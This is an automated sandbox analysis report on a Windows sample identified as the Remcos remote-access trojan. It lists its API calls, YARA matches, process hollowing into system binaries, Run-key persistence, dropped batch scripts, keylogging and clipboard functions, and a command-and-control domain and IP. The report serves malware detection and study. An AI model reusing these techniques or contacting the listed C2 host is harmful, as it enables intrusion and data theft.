Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004061C3 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_00446AF9 FindFirstFileExA
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0074A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007461C3 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0074A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007553F5 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00757754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007477EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00786AF9 FindFirstFileExA
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00747C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW

              Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: trapboijiggy.dvrlists.com
Source: global traffic | TCP traffic: 192.168.2.5:49745 -> 31.3.152.100:54614
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_00422251 recv
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00749BD9 OpenClipboard,GetClipboardData,CloseClipboard
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004089BA GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx

              E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match | File sources: identical to the list under AV Detection above (18 unpacked PEs, 9 memory dumps, 3 process memory spaces)

              Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to change the wallpaper
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00757F10 SystemParametersInfoW

              System Summary:

Malicious sample detected (through community Yara rule)
Source: 28.2.mobsync.exe.740000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.mobsync.exe.740000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.105919bb.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.105919bb.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.105919bb.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 32.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.mobsync.exe.105919bb.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.105919bb.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.mobsync.exe.105919bb.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: ZfigYV6HXd.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda) matched on the following sources:
              Source: 28.2.mobsync.exe.740000.0.raw.unpack, type: UNPACKEDPE
              Source: 32.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: 32.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: 28.2.mobsync.exe.740000.0.unpack, type: UNPACKEDPE
              Source: 28.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: 28.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: 32.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: 14.2.logagent.exe.105919bb.2.raw.unpack, type: UNPACKEDPE
              Source: 14.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: 32.2.logagent.exe.105919bb.1.unpack, type: UNPACKEDPE
              Source: 32.2.logagent.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
              Source: 32.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: 28.2.mobsync.exe.105919bb.1.unpack, type: UNPACKEDPE
              Source: 14.2.logagent.exe.105919bb.2.unpack, type: UNPACKEDPE
              Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: 28.2.mobsync.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
              Source: 14.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, type: MEMORY
              Source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: C:\Users\Public\Libraries\mlzcjkK.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers, author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00752BE1 ExitWindowsEx,LoadLibraryA,GetProcAddress
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004340D5
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_00423098
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_00411205
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0043820B
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004223C0
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0044D3FA
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0043843A
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0043450A
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_00419521
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0044B5AB
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_00431670
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0042E6D5
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004516E0
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004337C1
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004228B7
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0043493F
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0043FA50
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0041AAA0
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007740D5
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00763098
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00751205
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0077820B
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0078D3FA
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007623C0
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0077843A
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00759521
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0077450A
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0078B5AB
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00771670
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007916E0
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0076E6D5
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007737C1
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007628B7
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0077493F
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0077FA50
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0075AAA0
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00770BBE
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0078BCC9
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00773CBD
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00762F55
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00777FDC
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: String function: 0042F49E appears 37 times
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: String function: 00402084 appears 66 times
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: String function: 0042FB60 appears 39 times
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 00742084 appears 79 times
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 0076FB60 appears 53 times
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 0076F49E appears 37 times
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle
              Source: ZfigYV6HXd.exe | Virustotal: Detection: 31%
              Source: ZfigYV6HXd.exe | ReversingLabs: Detection: 26%
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | File read: C:\Users\user\Desktop\ZfigYV6HXd.exe
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown | Process created: C:\Users\user\Desktop\ZfigYV6HXd.exe 'C:\Users\user\Desktop\ZfigYV6HXd.exe'
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe 'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe'
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe 'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe'
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_00413958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00753958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Kkjczlmayclzjlniqyuemyubilsdhtk[1]
              Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@23/10@42/2
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (3 times)
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (6 times)
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0040D211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_01
              Source: C:\Windows\SysWOW64\logagent.exe | Mutant created: \Sessions\1\BaseNamedObjects\Octopus-GM39UT
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00756C39 FindResourceA,LoadResource,LockResource,SizeofResource
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 times)
              Source: C:\Windows\SysWOW64\logagent.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 times)
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | File read: C:\Windows\System32\drivers\etc\hosts (6 times)
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | Code function: 1_3_0339802C push eax; ret 1_3_03398068 (4 times)
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | Code function: 1_3_032F545C push eax; ret 1_3_032F5498
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_004510A8 push eax; ret 14_2_004510C6
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_00458445 push esi; ret 14_2_0045844E
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_00450786 push ecx; ret 14_2_00450799
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | Code function: 19_3_0339802C push eax; ret 19_3_03398068 (4 times)
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | Code function: 19_3_032F545C push eax; ret 19_3_032F5498
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | Code function: 25_3_03398036 push eax; ret 25_3_03398068
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | Code function: 25_3_0339802C push eax; ret 25_3_03398068 (4 times)
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007910A8 push eax; ret 28_2_007910C6
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00798445 push esi; ret 28_2_0079844E
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00790786 push ecx; ret 28_2_00790799
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0076FBA6 push ecx; ret 28_2_0076FBB9
              Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | File created: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe (dropped file)
              Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00745C8B ShellExecuteW,URLDownloadToFileW
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Kkjczlm (2 times)
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              Delayed program exit found
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0040D0B5 Sleep,ExitProcess,14_2_0040D0B5
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_0074D0B5 Sleep,ExitProcess,28_2_0074D0B5
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\SysWOW64\logagent.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 14_2_004160DB
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 28_2_007560DB
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040A012
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_004061C3 FindFirstFileW,FindNextFileW,14_2_004061C3
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040A22D
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_004153F5
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,14_2_00417754
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004077EC
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_00446AF9 FindFirstFileExA,14_2_00446AF9
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_0074A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_0074A012
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_007461C3 FindFirstFileW,FindNextFileW,28_2_007461C3
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_0074A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_0074A22D
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_007553F5 FindFirstFileW,FindNextFileW,FindNextFileW,28_2_007553F5
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_00757754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,28_2_00757754
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_007477EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_007477EC
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_00786AF9 FindFirstFileExA,28_2_00786AF9
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_00747C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_00747C55
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,14_2_0040697D
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0042F727
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0040CD09
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0040F15D GetProcessHeap,OpenProcess,OpenProcess,OpenProcess,GetCurrentProcessId,OpenProcess,GetCurrentProcessId,OpenProcess,14_2_0040F15D
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_0077CB4E mov eax, dword ptr fs:[00000030h] 28_2_0077CB4E
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Code function: 1_3_032F4D2C LdrInitializeThunk,1_3_032F4D2C
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0042F8B9 SetUnhandledExceptionFilter,14_2_0042F8B9
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0042F727
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_00436793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00436793
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_0076F8B9 SetUnhandledExceptionFilter,28_2_0076F8B9
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_0076F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0076F727
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_00776793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00776793
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_0076FD2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0076FD2C

              HIPS / PFW / Operating System Protection Evasion:

              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: BE0000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: BF0000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EA0000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EB0000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EC0000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: E00000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: E10000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: E20000
